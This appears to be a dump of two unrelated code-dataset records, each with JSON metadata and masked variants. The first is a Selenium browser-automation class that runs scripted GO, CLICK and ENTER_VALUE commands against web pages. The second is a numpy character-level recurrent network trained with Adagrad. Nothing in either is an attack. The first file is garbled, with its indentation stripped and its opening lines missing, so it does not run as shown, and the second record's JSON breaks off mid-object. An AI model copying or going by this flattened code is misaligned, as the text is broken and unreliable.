from selenium.webdriver.common.keys import Keys
from URL_Status import *
import time # for sleep
import requests #to check status of the page
from Utilities import *
class PatternScraping():
def __init__(self,output_filename=None,developer_mode=False,print_instance=None,browser_instance=None,log_process_status=True,write_output=True):
self.developer_mode = developer_mode
self.log_process_status=log_process_status
if output_filename:
self.output_filename=output_filename
else:
self.output_filename='PatternScraping.' + get_timestamp_for_file() + '.testing.txt'
self.write_output=write_output
self.possible_commands = ['GO', 'GET_VALUE', 'CLICK', 'ENTER_VALUE','EXIT', 'SLEEP', 'GET_VALUES','GET_LINKS']
self.possible_command_types = ['ID', 'XPATH', 'NAME', 'CLASS', 'CSS']
self.browser = None
self.ins_browser=browser_instance
self.initiate_print_instance(instance_instance=print_instance)
def _print_(self,input_string_in,skip_timestamp=False,add_leading_space=True,message_priority=''):
module_name='PatternScraping'
input_string=input_string_in
if isinstance(input_string,str):
input_string = get_html_to_unicode_string(input_string)
if self.print_instance:
self.print_instance.customPrint(input_string,skip_timestamp=skip_timestamp,add_leading_space=add_leading_space,module_name=module_name,message_priority=message_priority)
else:
print_string=u'' + module_name + '\t' + message_priority + '\t' + input_string
if not skip_timestamp:
print_string = log_time_stamp() + print_string
            print(get_printable_string(print_string))
def initiate_print_instance(self,instance_instance=None):
self.print_instance=None
if instance_instance:
try:
if instance_instance.check():
self.print_instance=instance_instance
return True
except:
return False
return False
def validate_input_commands(self,list_of_commands):#commands have tupple
print_prefix='validate_input_commands\t'
for i in range(len(list_of_commands)):
if self.developer_mode:
self._print_(print_prefix + 'Current Input:' + str(list_of_commands[i]))
if list_of_commands[i][0] not in self.possible_commands:
self._print_(print_prefix + 'Command not in list:' + str(list_of_commands[i][0]))
custom_exit()
line_no = str(i + 1)
list_length = len(list_of_commands[i])
command_name=list_of_commands[i][0]
if command_name not in ['GO','SLEEP','EXIT'] and list_of_commands[i][1] not in self.possible_command_types:
status="Unknown command type"+" in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
if command_name == 'GO':
if not list_of_commands[i][1]:
status = "no link provided" + " in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
if command_name == 'GET_VALUE':
if list_length != 4 or any(list_of_commands[i]) is False:
status = "no data provided"+" in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
if command_name == 'GET_VALUES':
if list_length != 4 or any(list_of_commands[i]) is False:
status = "no link provided"+" in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
if command_name == 'CLICK':
if list_length != 3 and list_length != 5:
status = "click command length error "+" in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
if any(list_of_commands[i]) is False:
status = "click syntax error"+" in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
if command_name == 'ENTER_VALUE':
if not (list_length == 4 and list_of_commands[i][2]
and list_of_commands[i][3]):
status = "ENTER VALUE syntax error"+" in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
if command_name == 'SLEEP':
if not (list_of_commands[i][1] and (list_length == 2)):
status = "SLEEP time not provided"+" in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
if command_name == 'EXIT':
if list_length != 1:
status = "Exit syntax error"+" in line number "+ line_no
self._print_(print_prefix + status)
custom_exit()
return True
def feed_input(self, input_commands):
print_prefix='feed_input\t'
self.data_dict = {}
#if self.developer_mode: self._print_(self.browser.page_source)
if isinstance(input_commands,str):
with open(input_commands, "r") as fopen:
self.base_list_of_lists = []
self.command_list = fopen.readlines()
for each_line in self.command_list:
self.base_list_of_lists.append((each_line.replace("\n", "")).split("\t"))
elif isinstance(input_commands,list):
self.base_list_of_lists=input_commands
else:
self._print_(print_prefix + ' Input argument should be either string(filename) or list(commands). Passed:' + str(type(input_commands)))
custom_exit()
input_status=self.validate_input_commands(self.base_list_of_lists)
if self.developer_mode and input_status:
self._print_(print_prefix + 'Input is Valid')
return True
def run(self):
if not self.ins_browser:
if not self.browser:
self.browser = webdriver.PhantomJS()#Chrome()
else:
self.browser=self.ins_browser
i = 0
for each_list in self.base_list_of_lists:
if self.developer_mode:
self._print_('Input:\t' + str(i + 1) + '\t' + str(each_list))
line = '\t'.join(each_list)
if each_list[0] == 'GO':
try:
status = self.go(each_list)
if self.developer_mode: self._print_('Command:\tGO\tStatus\t' + str(status))
self.file_write(line, status)
if status == 'Not available':
return 'Not available'
except Exception as e:
self.file_write(line, str(e))
return str(e)
elif each_list[0] == 'GET_VALUE':
try:
status = self.get_value(each_list)
if self.developer_mode: self._print_('Command:\tGET_VALUE\tStatus\t' + str(status))
self.file_write(line, status)
except Exception as e:
self.file_write(line, str(e))
return str(e)
elif each_list[0] == 'GET_VALUES':
# self._print_(self.browser.page_source.encode('utf-8')
try:
status = self.get_values(each_list)
if self.developer_mode: self._print_('Command:\tGET_VALUES\tStatus\t' + str(status))
self.file_write(line, status)
except Exception as e:
self.file_write(line, str(e))
return str(e)
elif each_list[0] == 'GET_LINKS':
try:
self.file_write(line, "Links as below")
status = self.get_links(each_list)
if self.developer_mode: self._print_('Command:\tGET_LINKS\tStatus\t' + str(status))
except Exception as e:
self.file_write(line, str(e))
return str(e)
elif each_list[0] == 'CLICK':
try:
status = self.click(each_list)
if self.developer_mode: self._print_('Command:\tCLICK\tStatus\t' + str(status))
self.file_write(line, status)
if status == 'Not available':
return 'Not available'
except Exception as e:
self.file_write(line, str(e))
return str(e)
elif each_list[0] == 'ENTER_VALUE':
try:
status = self.enter_value(each_list)
if self.developer_mode: self._print_('Command:\tENTER_VALUE\tStatus\t' + str(status))
self.file_write(line, status)
if status == 'Not available':
return 'Not available'
except Exception as e:
self.file_write(line, str(e))
return str(e)
elif each_list[0] == 'SLEEP':
self.sleep(each_list[1])
status = "Slept for " + each_list[1] + " second(s)"
if self.developer_mode: self._print_('Command:\tSLEEP\tStatus\t' + str(status))
self.file_write(line, status)
elif each_list[0] == 'EXIT':
self.file_write("EXIT", "OK")
if self.developer_mode: self._print_('Command:\tEXIT')
self.browser.quit()
i += 1
def go(self, list_of_values):
self.browser.get(list_of_values[1])
r = requests.get(list_of_values[1])
time.sleep(2)
link_status = r.status_code
return link_status
def close(self):
if not self.ins_browser:
if self.browser:
self.browser.quit()
def click(self, list_of_values):
try:
if list_of_values[1] == 'ID':
a_obj = self.find_by_id(list_of_values[2])
elif list_of_values[1] == 'XPATH':
a_obj = self.find_by_xpath(list_of_values[2])
elif list_of_values[1] == 'NAME':
a_obj = self.find_by_name(list_of_values[2])
elif list_of_values[1] == 'CLASS':
a_obj = self.find_by_class(list_of_values[2])
if len(list_of_values) == 3:
a_obj.click()
return "OK"
elif len(list_of_values) > 3:
if list_of_values[4] == 'Available':
if list_of_values[3] in self.data_dict.keys():
a_obj.click()
return "OK"
else:
return "Not available"
elif list_of_values[4] == 'Not Available':
if list_of_values[3] not in self.data_dict.keys():
a_obj.click()
                        self._print_('Function:\tclick\tCondition:\t' + 'Not Available')
return "OK"
else:
return "Not available"
else:
if list_of_values[4] == self.data_dict[list_of_values[3]]:
a_obj.click()
return "OK"
else:
return "Not available"
except NoSuchElementException as e:
self._print_('Function:\tclick\tError:\t' + str(e) + '\t Input:' + str(list_of_values))
return "Not available"
def get_value(self, list_of_values):
if list_of_values[1] == 'ID':
a_obj = self.find_by_id(list_of_values[2])
elif list_of_values[1] == 'XPATH':
a_obj = self.find_by_xpath(list_of_values[2])
elif list_of_values[1] == 'NAME':
a_obj = self.find_by_name(list_of_values[2])
if a_obj:
self.data_dict[list_of_values[3]] = a_obj.text
if self.developer_mode: self._print_('Function\tget_value\tData:\t' + str(self.data_dict))
return a_obj.text
return "Not available"
def get_values(self, list_of_values):
edge_list = []
new_news_list = []
if list_of_values[1] == 'CLASS':
elements = self.find_by_css_selector(list_of_values[2])
elif list_of_values[1] == 'XPATH':
elements = self.find_by_xpath(list_of_values[2])
elif list_of_values[1] == 'NAME':
elements = self.find_by_name(list_of_values[2])
elif list_of_values[1] == 'CSS':
elements = self.find_by_css_selector(list_of_values[2])
if elements:
edge_list = [a.get_attribute("href") for a in elements]
for each in edge_list:
if each and (not each.startswith('mailto')) and each not in new_news_list:
new_news_list.append(each)
return new_news_list
def get_links(self, list_of_values):
edge_list = []
new_news_list = []
if list_of_values[1] == 'CLASS':
path = "div."+list_of_values[2]+" a"
elements = self.find_by_css_selector(path)
elif list_of_values[1] == 'ID':
path = "div#"+list_of_values[2]+" a"
elements = self.find_by_css_selector(path)
if elements:
edge_list = [a.get_attribute("href") for a in elements]
for each in edge_list:
if each and (not each.startswith('mailto')) and each not in new_news_list:
new_news_list.append(each)
if new_news_list: #do we need to check the 4th argument
self.data_dict[list_of_values[3]]=new_news_list
main_window = self.browser.current_window_handle
if self.developer_mode: self._print_('Function\tget_links\tData:\t' + str(new_news_list))
self.file_write("",str(len(new_news_list))+ " link(s) found. Their status are: (link"+"\t"+"is_url_active"+"\t"+"is_redirected"+"\t"+"redirected_to"+")")
for each_link in new_news_list:
res_dict = url_check_status(each_link)
line = each_link+"\t"+res_dict['URL_Active']+"\t"+res_dict['Redirected']
self.file_write(line, res_dict['Redirected_into'])
return new_news_list
def enter_value(self, list_of_values):
if list_of_values[1] == 'ID':
a_obj = self.find_by_id(list_of_values[2])
elif list_of_values[1] == 'XPATH':
a_obj = self.find_by_xpath(list_of_values[2])
elif list_of_values[1] == 'NAME':
a_obj = self.find_by_name(list_of_values[2])
if a_obj:
if list_of_values[3] == "Keys.ENTER":
a_obj.send_keys(Keys.ENTER)
else:
a_obj.send_keys(list_of_values[3])
return "Value entered"
return "Not available"
def sleep(self, sleep_time):
time.sleep(float(sleep_time))
return True
def find_by_id(self, input_id):
input_id_obj = self.browser.find_element_by_id(input_id)
return input_id_obj
def find_elements_by_id(self, input_id):
input_id_obj = self.browser.find_elements_by_id(input_id)
return input_id_obj
def find_by_xpath(self, input_xpath):
input_xpath_obj = self.browser.find_element_by_xpath(input_xpath)
return input_xpath_obj
def find_by_name(self, input_name):
input_id_obj = self.browser.find_element_by_name(input_name)
return input_id_obj
def find_by_class(self, input_name):
input_class_obj = self.browser.find_element_by_class_name(input_name)
return input_class_obj
def find_by_css_selector(self, input_name):
input_class_obj = self.browser.find_elements_by_css_selector(input_name)
return input_class_obj
def file_write(self, command_line, status):
if self.write_output:
with open(self.output_filename, "a") as result_file:
result_file.write(command_line + "\t" + str(status) + "\n")
def get_data_dictionary(self):
return self.data_dict
if __name__ == '__main__':
# input_filename = 'input.txt'
input_filename = 'input_22.txt'
output_filename = 'output.txt'
obj = PatternScraping(developer_mode=True)
obj.feed_input([['GO','https://www.google.com'],['SLEEP','1'],['ENTER_VALUE','ID','lst-ib','Testing Automation'],['CLICK','NAME','btnG'],['SLEEP','5'],['EXIT']])
obj.run()
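    # feed_input also accepts a filename; such a file is read line by line and split on tabs,
    # so an equivalent command script (hypothetical input.txt, <TAB> = a literal tab) would be:
    #   GO<TAB>https://www.google.com
    #   SLEEP<TAB>1
    #   ENTER_VALUE<TAB>ID<TAB>lst-ib<TAB>Testing Automation
    #   CLICK<TAB>NAME<TAB>btnG
    #   EXIT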
|
normal
|
{
"blob_id": "9e77385933cf6e381f25bea9020f909d5dc6817d",
"index": 4744,
"step-1": "# -*- coding: utf-8 -*-\n\"\"\"\n Description: This modules is used for testing. Testing is performed based on the list of commands given to perform in a website\n Version : v1.5\n History :\n v1.0 - 08/01/2016 - Initial version\n v1.1 - 08/05/2016 - Modified to accept List input.\n v1.2 - 08/05/2016 - Removed dead code in feed_input\n v1.3 - 08/05/2016 - Added function get_data_dictionary to return the fetched values\n v1.4 - 09/01/2016 - updated _print_ function and added log_process_status variable\n v1.5 - 09/22/2016 - variable to suppress output running. Default - output will be written to file.\n Open Issues: None.\n Pending : Enhance coding standards. Clean up dead code in feed_input function\n\"\"\"\n__version__ = \"1.0.0\"\nfrom selenium import webdriver\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.webdriver.common.keys import Keys\nfrom URL_Status import *\nimport time # for sleep\nimport requests #to check status of the page\nfrom Utilities import *\nclass PatternScraping():\n\n def __init__(self,output_filename=None,developer_mode=False,print_instance=None,browser_instance=None,log_process_status=True,write_output=True):\n self.developer_mode = developer_mode\n self.log_process_status=log_process_status\n if output_filename:\n self.output_filename=output_filename\n else:\n self.output_filename='PatternScraping.' + get_timestamp_for_file() + '.testing.txt'\n self.write_output=write_output\n self.possible_commands = ['GO', 'GET_VALUE', 'CLICK', 'ENTER_VALUE','EXIT', 'SLEEP', 'GET_VALUES','GET_LINKS']\n self.possible_command_types = ['ID', 'XPATH', 'NAME', 'CLASS', 'CSS']\n self.browser = None\n self.ins_browser=browser_instance\n self.initiate_print_instance(instance_instance=print_instance)\n\n def _print_(self,input_string_in,skip_timestamp=False,add_leading_space=True,message_priority=''):\n module_name='PatternScraping'\n input_string=input_string_in\n if isinstance(input_string,str):\n input_string = get_html_to_unicode_string(input_string)\n if self.print_instance:\n self.print_instance.customPrint(input_string,skip_timestamp=skip_timestamp,add_leading_space=add_leading_space,module_name=module_name,message_priority=message_priority)\n else:\n print_string=u'' + module_name + '\\t' + message_priority + '\\t' + input_string\n if not skip_timestamp:\n print_string = log_time_stamp() + print_string\n print get_printable_string(print_string)\n def initiate_print_instance(self,instance_instance=None):\n self.print_instance=None\n if instance_instance:\n try:\n if instance_instance.check():\n self.print_instance=instance_instance\n return True\n except: \n return False \n return False\n def validate_input_commands(self,list_of_commands):#commands have tupple\n print_prefix='validate_input_commands\\t'\n for i in range(len(list_of_commands)):\n if self.developer_mode:\n self._print_(print_prefix + 'Current Input:' + str(list_of_commands[i]))\n if list_of_commands[i][0] not in self.possible_commands:\n self._print_(print_prefix + 'Command not in list:' + str(list_of_commands[i][0]))\n custom_exit()\n line_no = str(i + 1)\n list_length = len(list_of_commands[i])\n command_name=list_of_commands[i][0]\n if command_name not in ['GO','SLEEP','EXIT'] and list_of_commands[i][1] not in self.possible_command_types:\n status=\"Unknown command type\"+\" in line number \"+ line_no\n self._print_(print_prefix + status)\n custom_exit()\n if command_name == 'GO':\n if not list_of_commands[i][1]:\n status = \"no link provided\" + \" in line number \"+ 
line_no\n self._print_(print_prefix + status)\n custom_exit()\n if command_name == 'GET_VALUE':\n if list_length != 4 or any(list_of_commands[i]) is False:\n status = \"no data provided\"+\" in line number \"+ line_no\n self._print_(print_prefix + status)\n custom_exit()\n if command_name == 'GET_VALUES':\n if list_length != 4 or any(list_of_commands[i]) is False:\n status = \"no link provided\"+\" in line number \"+ line_no\n self._print_(print_prefix + status)\n custom_exit()\n if command_name == 'CLICK':\n if list_length != 3 and list_length != 5:\n status = \"click command length error \"+\" in line number \"+ line_no\n self._print_(print_prefix + status)\n custom_exit()\n if any(list_of_commands[i]) is False:\n status = \"click syntax error\"+\" in line number \"+ line_no\n self._print_(print_prefix + status)\n custom_exit()\n if command_name == 'ENTER_VALUE':\n if not (list_length == 4 and list_of_commands[i][2]\n and list_of_commands[i][3]):\n status = \"ENTER VALUE syntax error\"+\" in line number \"+ line_no\n self._print_(print_prefix + status)\n custom_exit()\n if command_name == 'SLEEP':\n if not (list_of_commands[i][1] and (list_length == 2)):\n status = \"SLEEP time not provided\"+\" in line number \"+ line_no\n self._print_(print_prefix + status)\n custom_exit()\n if command_name == 'EXIT':\n if list_length != 1:\n status = \"Exit syntax error\"+\" in line number \"+ line_no\n self._print_(print_prefix + status)\n custom_exit()\n return True\n def feed_input(self, input_commands):\n print_prefix='feed_input\\t'\n self.data_dict = {}\n #if self.developer_mode: self._print_(self.browser.page_source)\n if isinstance(input_commands,str):\n with open(input_commands, \"r\") as fopen:\n self.base_list_of_lists = []\n self.command_list = fopen.readlines()\n for each_line in self.command_list:\n self.base_list_of_lists.append((each_line.replace(\"\\n\", \"\")).split(\"\\t\"))\n elif isinstance(input_commands,list):\n self.base_list_of_lists=input_commands\n else:\n self._print_(print_prefix + ' Input argument should be either string(filename) or list(commands). 
Passed:' + str(type(input_commands)))\n custom_exit()\n input_status=self.validate_input_commands(self.base_list_of_lists)\n if self.developer_mode and input_status:\n self._print_(print_prefix + 'Input is Valid')\n return True\n\n def run(self):\n if not self.ins_browser:\n if not self.browser:\n self.browser = webdriver.PhantomJS()#Chrome()\n else:\n self.browser=self.ins_browser\n i = 0\n for each_list in self.base_list_of_lists:\n if self.developer_mode: \n self._print_('Input:\\t' + str(i + 1) + '\\t' + str(each_list))\n line = '\\t'.join(each_list)\n if each_list[0] == 'GO':\n try:\n status = self.go(each_list)\n if self.developer_mode: self._print_('Command:\\tGO\\tStatus\\t' + str(status))\n self.file_write(line, status)\n if status == 'Not available':\n return 'Not available'\n except Exception as e:\n self.file_write(line, str(e))\n return str(e)\n elif each_list[0] == 'GET_VALUE':\n try:\n status = self.get_value(each_list)\n if self.developer_mode: self._print_('Command:\\tGET_VALUE\\tStatus\\t' + str(status))\n self.file_write(line, status)\n except Exception as e:\n self.file_write(line, str(e))\n return str(e)\n elif each_list[0] == 'GET_VALUES':\n # self._print_(self.browser.page_source.encode('utf-8')\n try:\n status = self.get_values(each_list)\n if self.developer_mode: self._print_('Command:\\tGET_VALUES\\tStatus\\t' + str(status)) \n self.file_write(line, status)\n except Exception as e:\n self.file_write(line, str(e))\n return str(e)\n elif each_list[0] == 'GET_LINKS':\n try:\n self.file_write(line, \"Links as below\")\n status = self.get_links(each_list)\n if self.developer_mode: self._print_('Command:\\tGET_LINKS\\tStatus\\t' + str(status))\n except Exception as e:\n self.file_write(line, str(e))\n return str(e)\n elif each_list[0] == 'CLICK':\n try:\n status = self.click(each_list) \n if self.developer_mode: self._print_('Command:\\tCLICK\\tStatus\\t' + str(status))\n self.file_write(line, status)\n if status == 'Not available':\n return 'Not available'\n except Exception as e:\n self.file_write(line, str(e))\n return str(e)\n elif each_list[0] == 'ENTER_VALUE':\n try:\n status = self.enter_value(each_list)\n if self.developer_mode: self._print_('Command:\\tENTER_VALUE\\tStatus\\t' + str(status))\n self.file_write(line, status)\n if status == 'Not available':\n return 'Not available'\n except Exception as e:\n self.file_write(line, str(e))\n return str(e)\n elif each_list[0] == 'SLEEP':\n self.sleep(each_list[1])\n status = \"Slept for \" + each_list[1] + \" second(s)\"\n if self.developer_mode: self._print_('Command:\\tSLEEP\\tStatus\\t' + str(status))\n self.file_write(line, status)\n elif each_list[0] == 'EXIT':\n self.file_write(\"EXIT\", \"OK\")\n if self.developer_mode: self._print_('Command:\\tEXIT')\n self.browser.quit()\n i += 1\n\n def go(self, list_of_values):\n self.browser.get(list_of_values[1])\n r = requests.get(list_of_values[1])\n time.sleep(2)\n link_status = r.status_code\n return link_status\n def close(self):\n if not self.ins_browser:\n if self.browser:\n self.browser.quit()\n def click(self, list_of_values):\n try:\n if list_of_values[1] == 'ID':\n a_obj = self.find_by_id(list_of_values[2])\n elif list_of_values[1] == 'XPATH':\n a_obj = self.find_by_xpath(list_of_values[2])\n elif list_of_values[1] == 'NAME':\n a_obj = self.find_by_name(list_of_values[2])\n elif list_of_values[1] == 'CLASS':\n a_obj = self.find_by_class(list_of_values[2])\n if len(list_of_values) == 3:\n a_obj.click()\n return \"OK\"\n elif len(list_of_values) > 3:\n if 
list_of_values[4] == 'Available':\n if list_of_values[3] in self.data_dict.keys():\n a_obj.click()\n return \"OK\"\n else:\n return \"Not available\"\n elif list_of_values[4] == 'Not Available':\n if list_of_values[3] not in self.data_dict.keys():\n a_obj.click()\n self._print_('Function:\\tclick\\tCondition:\\t' + 'Available')\n return \"OK\"\n else:\n return \"Not available\"\n else:\n if list_of_values[4] == self.data_dict[list_of_values[3]]:\n a_obj.click()\n return \"OK\"\n else:\n return \"Not available\"\n except NoSuchElementException as e:\n self._print_('Function:\\tclick\\tError:\\t' + str(e) + '\\t Input:' + str(list_of_values))\n return \"Not available\"\n\n def get_value(self, list_of_values):\n if list_of_values[1] == 'ID':\n a_obj = self.find_by_id(list_of_values[2])\n elif list_of_values[1] == 'XPATH':\n a_obj = self.find_by_xpath(list_of_values[2])\n elif list_of_values[1] == 'NAME':\n a_obj = self.find_by_name(list_of_values[2])\n if a_obj:\n self.data_dict[list_of_values[3]] = a_obj.text\n if self.developer_mode: self._print_('Function\\tget_value\\tData:\\t' + str(self.data_dict))\n return a_obj.text\n return \"Not available\"\n\n def get_values(self, list_of_values):\n edge_list = []\n new_news_list = []\n if list_of_values[1] == 'CLASS':\n elements = self.find_by_css_selector(list_of_values[2])\n elif list_of_values[1] == 'XPATH':\n elements = self.find_by_xpath(list_of_values[2])\n elif list_of_values[1] == 'NAME':\n elements = self.find_by_name(list_of_values[2])\n elif list_of_values[1] == 'CSS':\n elements = self.find_by_css_selector(list_of_values[2])\n if elements:\n edge_list = [a.get_attribute(\"href\") for a in elements] \n for each in edge_list:\n if each and (not each.startswith('mailto')) and each not in new_news_list:\n new_news_list.append(each)\n return new_news_list\n\n def get_links(self, list_of_values):\n edge_list = []\n new_news_list = []\n if list_of_values[1] == 'CLASS':\n path = \"div.\"+list_of_values[2]+\" a\"\n elements = self.find_by_css_selector(path)\n elif list_of_values[1] == 'ID':\n path = \"div#\"+list_of_values[2]+\" a\"\n elements = self.find_by_css_selector(path)\n if elements: \n edge_list = [a.get_attribute(\"href\") for a in elements] \n for each in edge_list:\n if each and (not each.startswith('mailto')) and each not in new_news_list:\n new_news_list.append(each)\n if new_news_list: #do we need to check the 4th argument\n self.data_dict[list_of_values[3]]=new_news_list\n main_window = self.browser.current_window_handle \n if self.developer_mode: self._print_('Function\\tget_links\\tData:\\t' + str(new_news_list))\n self.file_write(\"\",str(len(new_news_list))+ \" link(s) found. 
Their status are: (link\"+\"\\t\"+\"is_url_active\"+\"\\t\"+\"is_redirected\"+\"\\t\"+\"redirected_to\"+\")\")\n for each_link in new_news_list:\n res_dict = url_check_status(each_link)\n line = each_link+\"\\t\"+res_dict['URL_Active']+\"\\t\"+res_dict['Redirected']\n self.file_write(line, res_dict['Redirected_into']) \n return new_news_list\n \n def enter_value(self, list_of_values):\n if list_of_values[1] == 'ID':\n a_obj = self.find_by_id(list_of_values[2])\n elif list_of_values[1] == 'XPATH':\n a_obj = self.find_by_xpath(list_of_values[2])\n elif list_of_values[1] == 'NAME':\n a_obj = self.find_by_name(list_of_values[2]) \n if a_obj:\n if list_of_values[3] == \"Keys.ENTER\":\n a_obj.send_keys(Keys.ENTER)\n else:\n a_obj.send_keys(list_of_values[3])\n return \"Value entered\"\n return \"Not available\"\n\n def sleep(self, sleep_time):\n time.sleep(float(sleep_time))\n return True\n\n def find_by_id(self, input_id):\n input_id_obj = self.browser.find_element_by_id(input_id)\n return input_id_obj\n \n def find_elements_by_id(self, input_id):\n input_id_obj = self.browser.find_elements_by_id(input_id)\n return input_id_obj\n\n def find_by_xpath(self, input_xpath):\n input_xpath_obj = self.browser.find_element_by_xpath(input_xpath)\n return input_xpath_obj\n\n def find_by_name(self, input_name):\n input_id_obj = self.browser.find_element_by_name(input_name)\n return input_id_obj\n \n def find_by_class(self, input_name):\n input_class_obj = self.browser.find_element_by_class_name(input_name)\n return input_class_obj\n \n def find_by_css_selector(self, input_name):\n input_class_obj = self.browser.find_elements_by_css_selector(input_name)\n return input_class_obj\n\n def file_write(self, command_line, status):\n if self.write_output:\n with open(self.output_filename, \"a\") as result_file:\n result_file.write(command_line + \"\\t\" + str(status) + \"\\n\")\n def get_data_dictionary(self):\n return self.data_dict\n\nif __name__ == '__main__':\n # input_filename = 'input.txt'\n input_filename = 'input_22.txt'\n output_filename = 'output.txt'\n obj = PatternScraping(developer_mode=True)\n obj.feed_input([['GO','https://www.google.com'],['SLEEP','1'],['ENTER_VALUE','ID','lst-ib','Testing Automation'],['CLICK','NAME','btnG'],['SLEEP','5'],['EXIT']])\n obj.run()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
import numpy as np
# data I/O
data = open('input.txt', 'r').read() # should be simple plain text file
chars = list(set(data))
data_size, vocab_size = len(data), len(chars)
print("chars: ", chars)
# character <-> index maps (the actual 1-of-k encoding is built inside lossFun)
char_to_ix = { ch:i for i,ch in enumerate(chars) }
ix_to_char = { i:ch for i,ch in enumerate(chars) }
iteration=50000
hidden_size = 100
seq_length = 25
learning_rate = 1e-1
# model parameters
U = np.random.randn(hidden_size, vocab_size)*0.01 # input to hidden
W = np.random.randn(hidden_size, hidden_size)*0.01 # hidden to hidden
V = np.random.randn(vocab_size, hidden_size)*0.01 # hidden to output
bh = np.zeros((hidden_size, 1)) # hidden bias
by = np.zeros((vocab_size, 1)) # output bias
def lossFun(inputs, targets, hprev):
x, h, yprime = {}, {}, {}
h[-1] = np.copy(hprev)
loss = 0
# forward pass
for t in range(len(inputs)):
x[t] = np.zeros((vocab_size,1))
x[t][inputs[t]] = 1 # encode-1ofk representation
h[t] = np.tanh(np.dot(U, x[t]) + np.dot(W, h[t-1]) + bh)
temp=np.dot(V, h[t]) + by
yprime[t] = np.exp(temp) / np.sum(np.exp(temp))
        loss += -np.log(yprime[t][targets[t],0]) # softmax (cross-entropy loss) for 1-of-k representation
# backprop
dU, dW, dV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)
dbh, dby = np.zeros_like(bh), np.zeros_like(by)
dhnext = np.zeros_like(h[0])
for t in reversed(range(len(inputs))):
dy = np.copy(yprime[t])
dy[targets[t]] -= 1 # backprop into y. http://cs231n.github.io/neural-networks-case-study/#grad
dV += np.dot(dy, h[t].T)
dby += dy
dh = np.dot(V.T, dy) + dhnext # backprop into h
dhraw = (1 - h[t] * h[t]) * dh # backprop through tanh nonlinearity
dbh += dhraw
dU += np.dot(dhraw, x[t].T)
dW += np.dot(dhraw, h[t-1].T)
dhnext = np.dot(W.T, dhraw)
for dparam in [dU, dW, dV, dbh, dby]:
np.clip(dparam, -5, 5, out=dparam) # clip to mitigate exploding gradients
return loss, dU, dW, dV, dbh, dby, h[len(inputs)-1]
n, p = 0, 0
mU, mW, mV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)
mbh, mby = np.zeros_like(bh), np.zeros_like(by) # memory variables for Adagrad
smooth_loss = -np.log(1.0/vocab_size)*seq_length # loss at iteration 0
for n in range(iteration):
if p+seq_length+1 >= len(data) or n == 0:
hprev = np.zeros((hidden_size,1)) # reset RNN memory
p = 0
inputs = [char_to_ix[ch] for ch in data[p:p+seq_length]]
targets = [char_to_ix[ch] for ch in data[p+1:p+seq_length+1]]
loss, dU, dW, dV, dbh, dby, hprev = lossFun(inputs, targets, hprev)
smooth_loss = smooth_loss * 0.999 + loss * 0.001
if n % 100 == 0:
        print(n, smooth_loss)
# perform parameter update with Adagrad
# for param, dparam, mem in zip([U, W, V, bh, by],
# [dU, dW, dV, dbh, dby],
# [mU, mW, mV, mbh, mby]):
# mem += dparam * dparam
# param += -learning_rate * dparam / np.sqrt(mem + 1e-8) # adagrad update
param=[U, W, V, bh, by]
dparam=[dU, dW, dV, dbh, dby]
mem=[mU, mW, mV, mbh, mby]
for i in range(len(param)):
mem[i] += dparam[i] * dparam[i]
param[i] += -learning_rate * dparam[i] / np.sqrt(mem[i] + 1e-8) # adagrad update
p += seq_length # move data pointer
# n += 1 # iteration counter
# if n>iteration:
# print("done")
# sys.exit(0)
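
# --- Added sketch (not part of the original script): sampling text from the trained weights.
# --- It reuses U, W, V, bh, by and the char/index maps defined above; the seed character and
# --- the sample length of 200 are arbitrary illustrative choices.
def sample(h, seed_ix, n):
    """Return n sampled character indices, starting from seed_ix and rolling the hidden state h forward."""
    x = np.zeros((vocab_size, 1))
    x[seed_ix] = 1
    ixes = []
    for _ in range(n):
        h = np.tanh(np.dot(U, x) + np.dot(W, h) + bh)  # same recurrence as the forward pass in lossFun
        y = np.dot(V, h) + by
        p = np.exp(y) / np.sum(np.exp(y))  # softmax over the vocabulary
        ix = np.random.choice(range(vocab_size), p=p.ravel())
        x = np.zeros((vocab_size, 1))
        x[ix] = 1
        ixes.append(ix)
    return ixes

# Example: print 200 characters generated from the final hidden state.
print(''.join(ix_to_char[ix] for ix in sample(hprev, inputs[0], 200)))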
|
normal
|
{
"blob_id": "d988cfebeec37df700f46bbb027a4980ba624d30",
"index": 6639,
"step-1": "<mask token>\n\n\ndef lossFun(inputs, targets, hprev):\n x, h, yprime = {}, {}, {}\n h[-1] = np.copy(hprev)\n loss = 0\n for t in range(len(inputs)):\n x[t] = np.zeros((vocab_size, 1))\n x[t][inputs[t]] = 1\n h[t] = np.tanh(np.dot(U, x[t]) + np.dot(W, h[t - 1]) + bh)\n temp = np.dot(V, h[t]) + by\n yprime[t] = np.exp(temp) / np.sum(np.exp(temp))\n loss += -np.log(yprime[t][targets[t], 0])\n dU, dW, dV = np.zeros_like(U), np.zeros_like(W), np.zeros_like(V)\n dbh, dby = np.zeros_like(bh), np.zeros_like(by)\n dhnext = np.zeros_like(h[0])\n for t in reversed(range(len(inputs))):\n dy = np.copy(yprime[t])\n dy[targets[t]] -= 1\n dV += np.dot(dy, h[t].T)\n dby += dy\n dh = np.dot(V.T, dy) + dhnext\n dhraw = (1 - h[t] * h[t]) * dh\n dbh += dhraw\n dU += np.dot(dhraw, x[t].T)\n dW += np.dot(dhraw, h[t - 1].T)\n dhnext = np.dot(W.T, dhraw)\n for dparam in [dU, dW, dV, dbh, dby]:\n np.clip(dparam, -5, 5, out=dparam)\n return loss, dU, dW, dV, dbh, dby, h[len(inputs) - 1]\n\n\n<mask token>\n",
